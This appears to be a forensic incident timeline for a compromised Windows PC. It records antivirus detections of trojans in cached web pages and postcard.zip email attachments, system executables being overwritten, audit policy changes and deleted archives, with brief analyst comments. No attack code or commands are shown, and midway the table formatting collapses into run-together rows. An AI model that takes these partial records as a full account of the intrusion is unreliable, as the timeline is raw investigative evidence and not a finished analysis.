| 10/01/07 14:59:30 | accessed | Icon84031A18.exe | C:\Documents and Settings\smith.99999\Application Data\Microsoft\Installer\{84031A18-BA9A-4156-A74F-E05B52DDFCE2}\Icon84031A18.exe Windows Executable Code\Executable File, Read Only, Archive |
| 10/01/07 14:59:30 | created | Icon84031A18.exe | C:\Documents and Settings\smith.99999\Application Data\Microsoft\Installer\{84031A18-BA9A-4156-A74F-E05B52DDFCE2}\Icon84031A18.exe Windows Executable Code\Executable File, Read Only, Archive |
| time | activity | name | path/details |
| --- | --- | --- | --- |
| 10/01/07 14:59:30 | written | Icon84031A18.exe | C:\Documents and Settings\smith.99999\Application Data\Microsoft\Installer\{84031A18-BA9A-4156-A74F-E05B52DDFCE2}\Icon84031A18.exe Windows Executable Code\Executable File, Read Only, Archive |
| 10/01/07 16:26:26 | accessed | SSSInstaller.dll | C:\Program Files\Screensavers.com\SSSInstaller\bin\SSSInstaller.dll Dynamic Link Library Code\Library Match File, Archive |
| 10/01/07 16:26:26 | modified | SSSInstaller.dll | C:\Program Files\Screensavers.com\SSSInstaller\bin\SSSInstaller.dll Dynamic Link Library Code\Library Match File, Archive |
| 10/01/07 16:26:27 | modified | SSSInstaller.dll | C:\Documents and Settings\smith.99999\Local Settings\Temp\SSSInstaller.dll Dynamic Link Library Code\Library Match File, Archive |
| 10/24/07 13:05:19 | Cleaned | ohioamericanlegion[1].htm | C:\Documents and Settings\smith.99999\Local Settings\Temporary Internet Files\Content.IE5\SZY7YXY1\ohioamericanlegion[1].htm W32/RAHack!htm (Trojan) C:\Program Files\Internet Explorer\iexplore.exe |
| 11/06/07 13:43:46 | created | Underwater Basket Weaving Majors and Minors 0708.xls | C:\Documents and Settings\smith.99999\My Documents\UBW Scholarships\Underwater Basket Weaving Majors and Minors 0708.xls |
| 11/06/07 13:43:46 | created | UBW Majors and Minors 0708.xls | C:\Documents and Settings\smith.99999\My Documents\UBW Scholarships\UBW Majors and Minors 0708.xls |
| 11/13/07 16:46:00 | created | TransferAgent.exe | C:\Documents and Settings\All Users\Application Data\Dell\TransferAgent\TransferAgent.exe Windows Executable Code\Executable File, Archive |
| 11/13/07 16:46:00 | written | TransferAgent.exe | C:\Documents and Settings\All Users\Application Data\Dell\TransferAgent\TransferAgent.exe Windows Executable Code\Executable File, Archive |
| 12/14/07 14:40:45 | accessed | Ken.mbx | C:\Documents and Settings\smith.99999\My Documents\Qualcomm\Eudora\Ken.mbx |
| 12/14/07 14:40:45 | created | Ken.mbx | C:\My Documents\Qualcomm\Eudora\Ken.mbx |
| 12/14/07 14:40:46 | accessed | Misc.mbx | C:\Documents and Settings\smith.99999\My Documents\Qualcomm\Eudora\Misc.mbx |
| 12/14/07 14:40:46 | created | Misc.mbx | C:\My Documents\Qualcomm\Eudora\Misc.mbx |
| 12/14/07 14:40:47 | accessed | Out.mbx | C:\Documents and Settings\smith.99999\My Documents\Qualcomm\Eudora\Out.mbx |
| 12/14/07 14:40:47 | created | Out.mbx | C:\My Documents\Qualcomm\Eudora\Out.mbx |
| 12/14/07 14:48:48 | created | Mike.mbx | C:\My Documents\Eudora\Mike.mbx |
| 12/14/07 14:48:49 | created | Misc.mbx | C:\My Documents\Eudora\Misc.mbx |
| 12/14/07 14:48:51 | created | Out.mbx | C:\My Documents\Eudora\Out.mbx |
| 12/14/07 14:49:01 | created | Previous search.mbx | C:\My Documents\Eudora\Previous search.mbx |
| 12/14/07 14:49:02 | created | Scholarship.mbx | C:\My Documents\Eudora\Scholarship.mbx |
| 12/14/07 14:50:37 | created | 37679041.pdf.zip | C:\My Documents\Eudora\attach\37679041.pdf.zip ZIP Compressed Archive File, Archive |
| 12/18/07 9:41:00 | created | Baum's Page Wrestling.url | http://www.baumspage.com/ Bookmarks - |
| 01/09/08 15:18:58 | Deleted | gnida[1].swf | C:\Documents and Settings\smith.99999\Local Settings\Temporary Internet Files\Content.IE5\CBPBUI7H\gnida[1].swf Generic Downloader.bk (Trojan) C:\Program Files\Internet Explorer\iexplore.exe |
| 01/22/08 16:53:30 | accessed | Mike.mbx | C:\Documents and Settings\smith.99999\My Documents\Eudora\Mike.mbx |
| 01/22/08 16:53:30 | accessed | Misc.mbx | C:\Documents and Settings\smith.99999\My Documents\Eudora\Misc.mbx |
| 01/22/08 16:53:30 | accessed | Out.mbx | C:\Documents and Settings\smith.99999\My Documents\Eudora\Out.mbx |
| 01/22/08 16:53:31 | accessed | Previous search.mbx | C:\Documents and Settings\smith.99999\My Documents\Eudora\Previous search.mbx |
| 01/22/08 16:53:32 | accessed | Scholarship.mbx | C:\Documents and Settings\smith.99999\My Documents\Eudora\Scholarship.mbx |
| 01/31/08 13:59:30 | accessed | 37679041.pdf.zip | C:\Documents and Settings\smith.99999\My Documents\Eudora\attach\37679041.pdf.zip ZIP Compressed Archive Match File, Archive |
| 02/08/08 11:08:46 | Cleaned | scholars1[1].htm | C:\Documents and Settings\smith.99999\Local Settings\Temporary Internet Files\Content.IE5\B1COUTNU\scholars1[1].htm W32/RAHack!htm (Trojan) C:\Program Files\Internet Explorer\iexplore.exe |
| 02/13/08 11:46:41 | Cleaned | scholars1[1].htm | C:\Documents and Settings\smith.99999\Local Settings\Temporary Internet Files\Content.IE5\67K7ML07\scholars1[1].htm W32/RAHack!htm (Trojan) C:\Program Files\Internet Explorer\iexplore.exe |
| 02/19/08 10:38:46 | | | we block the host for spamming |
| 02/22/08 10:58:38 | created | SbClientManager.exe | C:\Program Files\SafeBoot\SbClientManager.exe Windows Executable Code\Executable File, Archive |
| 02/22/08 11:00:00 | created | SafeBoot.scr | C:\WINDOWS\SafeBoot.scr Win NT Screen Saver Code\Executable File, Archive |
| 03/11/08 12:20:40 | created | uninstall.exe | C:\Program Files\Coupons\uninstall.exe Windows Executable Code\Executable Match File, Archive |
| 03/11/08 12:20:40 | written | uninstall.exe | C:\Program Files\Coupons\uninstall.exe Windows Executable Code\Executable Match File, Archive |
| 03/14/08 10:13:31 | Cleaned | scholars[1].htm | C:\Documents and Settings\smith.99999\Local Settings\Temporary Internet Files\Content.IE5\A2EWQP6T\scholars[1].htm W32/RAHack!htm (Trojan) C:\Program Files\Internet Explorer\IEXPLORE.EXE |
| 03/14/08 10:14:21 | Cleaned | scholars1[1].htm | C:\Documents and Settings\smith.99999\Local Settings\Temporary Internet Files\Content.IE5\K5Q3MFOP\scholars1[1].htm W32/RAHack!htm (Trojan) C:\Program Files\Internet Explorer\IEXPLORE.EXE |
| 03/17/08 10:58:56 | Cleaned | sal[1].htm | C:\Documents and Settings\smith.99999\Local Settings\Temporary Internet Files\Content.IE5\L08JLPKH\sal[1].htm W32/RAHack!htm (Trojan) C:\Program Files\Internet Explorer\iexplore.exe |
| 03/25/08 12:22:15 | accessed | Program_CheckNow_S_A865F9643D344747AD8AA93191B65DD3.exe | C:\WINDOWS\Installer\{7EFA5E6F-74F7-4AFB-8AEA-AA790BD3A76D}\Program_CheckNow_S_A865F9643D344747AD8AA93191B65DD3.exe Windows Executable Code\Executable Match File, Read Only, Archive |
| 03/25/08 12:22:16 | accessed | NewShortcut2_F04825A0D1E9444AA8D32CE95CBF1716.exe | C:\WINDOWS\Installer\{7EFA5E6F-74F7-4AFB-8AEA-AA790BD3A76D}\NewShortcut2_F04825A0D1E9444AA8D32CE95CBF1716.exe Windows Executable Code\Executable Match File, Read Only, Archive |
| 03/25/08 12:22:16 | accessed | Program_Help_SC1_A865F9643D344747AD8AA93191B65DD3.exe | C:\WINDOWS\Installer\{7EFA5E6F-74F7-4AFB-8AEA-AA790BD3A76D}\Program_Help_SC1_A865F9643D344747AD8AA93191B65DD3.exe Windows Executable Code\Executable File, Read Only, Archive |
| 03/25/08 12:22:17 | accessed | Program_FAQ_SC1_A865F9643D344747AD8AA93191B65DD3.exe | C:\WINDOWS\Installer\{7EFA5E6F-74F7-4AFB-8AEA-AA790BD3A76D}\Program_FAQ_SC1_A865F9643D344747AD8AA93191B65DD3.exe Windows Executable Code\Executable Match File, Read Only, Archive |
| 03/25/08 12:22:17 | accessed | Program_Setting_SC_A865F9643D344747AD8AA93191B65DD3.exe | C:\WINDOWS\Installer\{7EFA5E6F-74F7-4AFB-8AEA-AA790BD3A76D}\Program_Setting_SC_A865F9643D344747AD8AA93191B65DD3.exe Windows Executable Code\Executable Match File, Read Only, Archive |
| 03/25/08 12:29:21 | accessed | SSLang.exe | C:\Program Files\Samsung\Samsung ML-2570 Series\Install\data\SSLang.exe Windows Executable Code\Executable File |
| 03/25/08 12:29:21 | created | SSLang.exe | C:\Program Files\Samsung\Samsung ML-2570 Series\Install\data\SSLang.exe Windows Executable Code\Executable File |
| 03/25/08 12:29:25 | created | Ssopen.exe | C:\Program Files\Samsung\Samsung ML-2570 Series\Install\data\Ssopen.exe Windows Executable Code\Executable Match File |
| 03/25/08 12:30:10 | accessed | Ssopen.exe | C:\Program Files\Samsung\Samsung ML-2570 Series\Install\data\Ssopen.exe Windows Executable Code\Executable Match File |
| 03/25/08 12:30:53 | created | setup.exe | C:\Program Files\Samsung\Samsung ML-2570 Series\Install\setup.exe Windows Executable Code\Executable File |
| 03/25/08 12:34:38 | created | SSMMgr.exe | C:\WINDOWS\Samsung\PanelMgr\SSMMgr.exe Windows Executable Code\Executable File, Archive |
| 04/13/08 20:12:11 | written | accwiz.exe | C:\WINDOWS\SYSTEM32\accwiz.exe Windows Executable Code\Executable File, Archive |
| 04/13/08 20:12:14 | written | cmd.exe | C:\WINDOWS\SYSTEM32\cmd.exe Windows Executable Code\Executable File, Archive |
| 04/13/08 20:12:15 | written | conf.exe | C:\Program Files\NetMeeting\conf.exe Windows Executable Code\Executable File, Archive |
| 04/13/08 20:12:16 | written | ctfmon.exe | C:\WINDOWS\SYSTEM32\ctfmon.exe Windows Executable Code\Executable File, Archive |
| 04/13/08 20:12:16 | written | defrag.exe | C:\WINDOWS\SYSTEM32\defrag.exe Windows Executable Code\Executable File, Archive |
| 04/13/08 20:12:16 | written | dfrgntfs.exe | C:\WINDOWS\SYSTEM32\dfrgntfs.exe Windows Executable Code\Executable File, Archive |
| 04/13/08 20:12:18 | written | dumprep.exe | C:\WINDOWS\SYSTEM32\dumprep.exe Windows Executable Code\Executable File, Archive |
| 04/13/08 20:12:18 | written | dwwin.exe | C:\WINDOWS\SYSTEM32\dwwin.exe Windows Executable Code\Executable Match File, Archive |
| 04/13/08 20:12:19 | written | explorer.exe | C:\WINDOWS\explorer.exe Windows Executable Code\Executable File, Archive |
| 04/13/08 20:12:21 | written | fxscover.exe | C:\WINDOWS\SYSTEM32\fxscover.exe Windows Executable Code\Executable Match File, Archive |
| 04/13/08 20:12:21 | written | fxssvc.exe | C:\WINDOWS\SYSTEM32\fxssvc.exe Windows Executable Code\Executable File, Archive |
| 04/13/08 20:12:21 | written | helpsvc.exe | C:\WINDOWS\PCHEALTH\HELPCTR\BINARIES\helpsvc.exe Windows Executable Code\Executable File, Archive |
| 04/13/08 20:12:22 | written | imapi.exe | C:\WINDOWS\SYSTEM32\imapi.exe Windows Executable Code\Executable File, Archive |
| 04/13/08 20:12:22 | written | ipconfig.exe | C:\WINDOWS\SYSTEM32\ipconfig.exe Windows Executable Code\Executable File, Archive |
| 04/13/08 20:12:23 | written | mstsc.exe | C:\WINDOWS\SYSTEM32\mstsc.exe Windows Executable Code\Executable File, Archive |
| 04/13/08 20:12:28 | written | msimn.exe | C:\Program Files\Outlook Express\msimn.exe Windows Executable Code\Executable File, Archive |
| 04/13/08 20:12:28 | written | msmsgs.exe | C:\Program Files\Messenger\msmsgs.exe Windows Executable Code\Executable File, Archive |
| 04/13/08 20:12:29 | written | netsh.exe | C:\WINDOWS\SYSTEM32\netsh.exe Windows Executable Code\Executable File, Archive |
| 04/13/08 20:12:30 | written | ntbackup.exe | C:\WINDOWS\SYSTEM32\ntbackup.exe Windows Executable Code\Executable File, Archive |
| 04/13/08 20:12:30 | written | ntvdm.exe | C:\WINDOWS\SYSTEM32\ntvdm.exe Windows Executable Code\Executable File, Archive |
| 04/13/08 20:12:32 | written | regedit.exe | C:\WINDOWS\regedit.exe Windows Executable Code\Executable File, Archive |
| 04/13/08 20:12:33 | written | rundll32.exe | C:\WINDOWS\SYSTEM32\rundll32.exe Windows Executable |
Code\Executable File, Archive04/13/08 20:12:37 written taskkill.exe C:\\WINDOWS\SYSTEM32\taskkill.exe Windows Executable Code\Executable File, Archive04/13/08 20:12:37 written tasklist.exe C:\\WINDOWS\SYSTEM32\tasklist.exe Windows Executable Code\Executable File, Archive04/13/08 20:12:37 written taskmgr.exe C:\\WINDOWS\SYSTEM32\taskmgr.exe Windows Executable Code\Executable Match File, Archive04/13/08 20:12:38 written userinit.exe C:\\WINDOWS\SYSTEM32\userinit.exe Windows Executable Code\Executable File, Archive04/13/08 20:12:38 written verclsid.exe C:\\WINDOWS\SYSTEM32\verclsid.exe Windows Executable Code\Executable File04/13/08 20:12:38 written wab.exe C:\\Program Files\Outlook Express\wab.exe Windows Executable Code\Executable File, Archive04/13/08 20:12:40 written wordpad.exe C:\\Program Files\Windows NT\Accessories\wordpad.exe Windows Executable Code\Executable File, Archive04/14/08 8:56:50 Cleaned scholars[1].htm C:\Documents and Settings\smith.99999\Local Settings\Temporary Internet Files\Content.IE5\NSVT4NCB\scholars[1].htmW32/RAHack!htm (Trojan)C:\Program Files\Internet Explorer\IEXPLORE.EXE04/14/08 8:57:14 Cleaned dates[1].htm C:\Documents and Settings\smith.99999\Local Settings\Temporary Internet Files\Content.IE5\C9712A8M\dates[1].htmW32/RAHack!htm (Trojan)C:\Program Files\Internet Explorer\IEXPLORE.EXE04/14/08 8:57:44 Cleaned ohio[1].htm C:\Documents and Settings\smith.99999\Local Settings\Temporary Internet Files\Content.IE5\G0CBQJRK\ohio[1].htmW32/RAHack!htm (Trojan)C:\Program Files\Internet Explorer\IEXPLORE.EXE07/07/08 16:07:39 accessed ubw042706ay07.xls C:\\Documents and Settings\smith.99999\My Documents\UBW Scholarships\2006 Scholarships\ubw042706ay07.xls
07/07/08 16:07:39 accessed ogr-ubw042706ay07.xls C:\Documents and Settings\smith.99999\My Documents\UBW Scholarships\2006 Scholarships\ogr-ubw042706ay07.xls07/07/08 16:08:21 modified ubw042706ay07.xls C:\\Documents and Settings\smith.99999\My Documents\UBW Scholarships\2006 Scholarships\ubw042706ay07.xls
07/07/08 16:08:21 modified ogr-ubw042706ay07.xls C:\Documents and Settings\smith.99999\My Documents\UBW Scholarships\2006 Scholarships\ogr-ubw042706ay07.xls07/07/08 16:11:00 accessed IFT 07.xls C:\\Documents and Settings\smith.99999\My Documents\UBW Scholarships\IFT\IFT 07.xls
07/07/08 16:11:00 accessed IFT 07.xls C:\Documents and Settings\smith.99999\My Documents\UBW Scholarships\IFT\IFT 07.xls07/07/08 16:12:20 written Underwater Basket Weaving Majors and Minors 0708.xlsC:\\Documents and Settings\smith.99999\My Documents\UBW Scholarships\Underwater Basket Weaving Majors and Minors 0708.xls
07/07/08 16:12:20 written UBW Majors and Minors 0708.xls C:\Documents and Settings\smith.99999\My Documents\UBW Scholarships\UBW Majors and Minors 0708.xls07/07/08 16:13:57 modified IFT 07.xls C:\\Documents and Settings\smith.99999\My Documents\UBW Scholarships\IFT\IFT 07.xls
07/07/08 16:13:57 modified IFT 07.xls C:\Documents and Settings\smith.99999\My Documents\UBW Scholarships\IFT\IFT 07.xls07/08/08 22:13:26 created googleearth.exe C:\\Program Files\Google\Google Earth\googleearth.exe Windows Executable Code\Executable File, Archive07/08/08 22:13:26 written googleearth.exe C:\\Program Files\Google\Google Earth\googleearth.exe Windows Executable Code\Executable File, Archive07/22/08 13:09:41 modified Underwater Basket Weaving Majors and Minors 0708.xlsC:\\Documents and Settings\smith.99999\My Documents\UBW Scholarships\Underwater Basket Weaving Majors and Minors 0708.xls
07/22/08 13:09:41 modified UBW Majors and Minors 0708.xls C:\Documents and Settings\smith.99999\My Documents\UBW Scholarships\UBW Majors and Minors 0708.xls07/28/08 10:14:22 modified Mike.mbx C:\Program Files\Qualcomm\Eudora\Mike.mbx07/28/08 10:14:22 written Mike.mbx C:\Program Files\Qualcomm\Eudora\Mike.mbx
08/04/08 13:40:51 accessed REC719271.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\REC719271.zip ZIP Compressed Archive Match File, Recycled, Archive08/04/08 13:40:51 created REC719271.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\REC719271.zip ZIP Compressed Archive Match File, Recycled, Archive08/04/08 13:40:51 written REC719271.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\REC719271.zip ZIP Compressed Archive Match File, Recycled, Archive08/15/08 16:22:54 deleted REC719271.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\REC719271.zip ZIP Compressed Archive Match File, Recycled, Archive08/15/08 16:22:54 modified REC719271.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\REC719271.zip ZIP Compressed Archive Match File, Recycled, Archive08/25/08 6:27:59 logged SecEvent.Evt
08/25/08 8:06:28 logged SecEvent.Evt
09/10/08 6:29:15 logged SecEvent.Evt
EVENT ID: 612 EVENT TYPE: SUCCESS_AUDIT EVENT CATEGORY: Policy Change SID: S-1-5-18 COMPUTER: HACKEDPC DESCRIPTION: Audit Policy Change:;New Policy:; Success Failure; - - Logon/Logoff; - - Object Access; - - Privilege Use; - - Account Management; - - Policy Change; - - System; - - Detailed Tracking; - - Directory Service Access; - - Account Logon;Changed By:; User Name: HACKEDPC$; Domain Name: UNDERWATERBASKETWEAVING; Logon ID: (0x0,0x3E7)
EVENT ID: 612 EVENT TYPE: SUCCESS_AUDIT EVENT CATEGORY: Policy Change SID: S-1-5-18 COMPUTER: HACKEDPC DESCRIPTION: Audit Policy Change:;New Policy:; Success Failure; - - Logon/Logoff; - - Object Access; - - Privilege Use; - - Account Management; - - Policy Change; - - System; - - Detailed Tracking; - - Directory Service Access; + + Account Logon;Changed By:; User Name: HACKEDPC$; Domain Name: UNDERWATERBASKETWEAVING; Logon ID: (0x0,0x3E7)
EVENT ID: 612 EVENT TYPE: SUCCESS_AUDIT EVENT CATEGORY: Policy Change SID: S-1-5-18 COMPUTER: HACKEDPC DESCRIPTION: Audit Policy Change:;New Policy:; Success Failure; - - Logon/Logoff; - - Object Access; - - Privilege Use; - - Account Management; - - Policy Change; - - System; - - Detailed Tracking; - - Directory Service Access; - - Account Logon;Changed By:; User Name: HACKEDPC$; Domain Name: UNDERWATERBASKETWEAVING; Logon ID: (0x0,0x3E7)
09/10/08 8:03:48 logged SecEvent.Evt
09/16/08 6:52:20 logged SecEvent.Evt
09/16/08 6:52:20 logged SecEvent.Evt
09/16/08 7:17:51 logged SecEvent.Evt
09/16/08 7:17:52 logged SecEvent.Evt
09/16/08 7:59:46 accessed msimn.exe C:\\Program Files\Outlook Express\msimn.exe Windows Executable Code\Executable File, Archive
09/16/08 8:22:37 created WUAUCLT.EXE-1360D60A.pf C:\WINDOWS\Prefetch\WUAUCLT.EXE-1360D60A.pf
09/16/08 8:24:40 created WMIPRVSE.EXE-0D449B4F.pf C:\WINDOWS\Prefetch\WMIPRVSE.EXE-0D449B4F.pf
09/16/08 11:41:17 created USERINIT.EXE-0743FDA9.pf C:\WINDOWS\Prefetch\USERINIT.EXE-0743FDA9.pf
09/16/08 11:42:15 created SCHEDHLP.EXE-29F59EF1.pf C:\WINDOWS\Prefetch\SCHEDHLP.EXE-29F59EF1.pf
09/16/08 11:42:16 created SSMMGR.EXE-064D047E.pf C:\WINDOWS\Prefetch\SSMMGR.EXE-064D047E.pf
09/16/08 11:42:23 created TRANSFERAGENT.EXE-19919614.pf C:\WINDOWS\Prefetch\TRANSFERAGENT.EXE-19919614.pf
09/22/08 11:07:19 accessed tits.rar C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\tits.rar Compressed Archive Archive Match File, Recycled, Archive
09/22/08 11:07:19 created tits.rar C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\tits.rar Compressed Archive Archive Match File, Recycled, Archive
09/22/08 11:07:19 written tits.rar C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\tits.rar Compressed Archive Archive Match File, Recycled, Archive
09/23/08 8:14:23 accessed tits1.rar C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\tits1.rar Compressed Archive Archive Match File, Recycled, Archive
09/23/08 8:14:23 created tits1.rar C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\tits1.rar Compressed Archive Archive Match File, Recycled, Archive
09/23/08 8:14:23 written tits1.rar C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\tits1.rar Compressed Archive Archive Match File, Recycled, Archive
09/23/08 16:49:52 deleted tits1.rar C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\tits1.rar Compressed Archive Archive Match File, Recycled, Archive
09/23/08 16:49:52 modified tits1.rar C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\tits1.rar Compressed Archive Archive Match File, Recycled, Archive
10/02/08 17:28:00 deleted tits.rar C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\tits.rar Compressed Archive Archive Match File, Recycled, Archive
10/02/08 17:28:00 modified tits.rar C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\tits.rar Compressed Archive Archive Match File, Recycled, Archive
10/06/08 9:15:22 accessed pussy.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\pussy.zip ZIP Compressed Archive Match File, Recycled, Archive
10/06/08 9:15:22 created pussy.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\pussy.zip ZIP Compressed Archive Match File, Recycled, Archive
10/06/08 9:15:22 written pussy.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\pussy.zip ZIP Compressed Archive Match File, Recycled, Archive
10/06/08 17:04:10 deleted pussy.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\pussy.zip ZIP Compressed Archive Match File, Recycled, Archive
10/06/08 17:04:10 modified pussy.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\pussy.zip ZIP Compressed Archive Match File, Recycled, Archive
10/17/08 7:56:29 accessed postcard.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard.zip ZIP Compressed Archive Match File, Recycled, Archive
10/17/08 7:56:29 created postcard.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard.zip ZIP Compressed Archive Match File, Recycled, Archive
10/17/08 7:56:29 written postcard.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard.zip ZIP Compressed Archive Match File, Recycled, Archive
10/17/08 7:56:29 it's interesting to see how many postcard.zip files were created vs. what McAfee detected
10/17/08 7:56:29 Deleted postcard.zip C:\program files\qualcomm\eudora\attach\postcard.zip Generic Malware.a!zip (Trojan) C:\Program Files\Qualcomm\Eudora\Eudora.exe
10/20/08 11:16:34 accessed postcard1.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard1.zip ZIP Compressed Archive Match File, Recycled, Archive
10/20/08 11:16:34 created postcard1.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard1.zip ZIP Compressed Archive Match File, Recycled, Archive
10/20/08 11:16:34 written postcard1.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard1.zip ZIP Compressed Archive Match File, Recycled, Archive
10/21/08 7:32:35 accessed postcard2.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard2.zip ZIP Compressed Archive Match File, Recycled, Archive
10/21/08 7:32:35 created postcard2.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard2.zip ZIP Compressed Archive Match File, Recycled, Archive
10/21/08 7:32:35 written postcard2.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard2.zip ZIP Compressed Archive Match File, Recycled, Archive
10/22/08 7:31:40 Deleted postcard3.zip C:\program files\qualcomm\eudora\attach\postcard3.zip Generic Malware.a!zip (Trojan) C:\Program Files\Qualcomm\Eudora\Eudora.exe
10/23/08 9:01:13 accessed postcard3.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard3.zip ZIP Compressed Archive Match File, Recycled, Archive
10/23/08 9:01:13 created postcard3.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard3.zip ZIP Compressed Archive Match File, Recycled, Archive
10/23/08 9:01:13 written postcard3.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard3.zip ZIP Compressed Archive Match File, Recycled, Archive
10/24/08 7:32:37 accessed Rechnung.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\Rechnung.zip ZIP Compressed Archive Match File, Recycled, Archive
10/24/08 7:32:37 accessed postcard4.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard4.zip ZIP Compressed Archive Match File, Recycled, Archive
10/24/08 7:32:37 created Rechnung.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\Rechnung.zip ZIP Compressed Archive Match File, Recycled, Archive
10/24/08 7:32:37 created postcard4.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard4.zip ZIP Compressed Archive Match File, Recycled, Archive
10/24/08 7:32:37 written Rechnung.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\Rechnung.zip ZIP Compressed Archive Match File, Recycled, Archive
10/24/08 7:32:37 written postcard4.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard4.zip ZIP Compressed Archive Match File, Recycled, Archive
10/24/08 7:32:38 accessed postcard5.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard5.zip ZIP Compressed Archive Match File, Recycled, Archive
10/24/08 7:32:38 created postcard5.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard5.zip ZIP Compressed Archive Match File, Recycled, Archive
10/24/08 7:32:38 written postcard5.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard5.zip ZIP Compressed Archive Match File, Recycled, Archive
10/24/08 14:17:52 accessed Anhang.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\Anhang.zip ZIP Compressed Archive Match File, Recycled, Archive
10/24/08 14:17:52 created Anhang.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\Anhang.zip ZIP Compressed Archive Match File, Recycled, Archive
10/24/08 14:17:52 written Anhang.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\Anhang.zip ZIP Compressed Archive Match File, Recycled, Archive
10/27/08 17:00:55 deleted postcard.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard.zip ZIP Compressed Archive Match File, Recycled, Archive
10/27/08 17:00:55 modified postcard.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard.zip ZIP Compressed Archive Match File, Recycled, Archive
10/28/08 11:07:05 accessed wab.exe C:\\Program Files\Outlook Express\wab.exe Windows Executable Code\Executable File, Archive
10/31/08 7:38:51 Deleted postcard.zip C:\program files\qualcomm\eudora\attach\postcard.zip Generic Malware.a!zip (Trojan) C:\Program Files\Qualcomm\Eudora\Eudora.exe
11/03/08 7:54:43 accessed postcard.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard.zip ZIP Compressed Archive Match File, Recycled, Archive
11/03/08 7:54:43 created postcard.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard.zip ZIP Compressed Archive Match File, Recycled, Archive
11/03/08 7:54:43 written postcard.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard.zip ZIP Compressed Archive Match File, Recycled, Archive
11/03/08 16:55:53 deleted Rechnung.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\Rechnung.zip ZIP Compressed Archive Match File, Recycled, Archive
11/03/08 16:55:53 deleted postcard4.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard4.zip ZIP Compressed Archive Match File, Recycled, Archive
11/03/08 16:55:53 deleted postcard5.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard5.zip ZIP Compressed Archive Match File, Recycled, Archive
11/03/08 16:55:53 modified Rechnung.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\Rechnung.zip ZIP Compressed Archive Match File, Recycled, Archive
11/03/08 16:55:53 modified postcard4.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard4.zip ZIP Compressed Archive Match File, Recycled, Archive
11/03/08 16:55:53 modified postcard5.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard5.zip ZIP Compressed Archive Match File, Recycled, Archive
11/03/08 16:55:55 deleted postcard3.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard3.zip ZIP Compressed Archive Match File, Recycled, Archive
11/03/08 16:55:55 modified postcard3.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard3.zip ZIP Compressed Archive Match File, Recycled, Archive
11/03/08 16:56:00 deleted postcard1.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard1.zip ZIP Compressed Archive Match File, Recycled, Archive
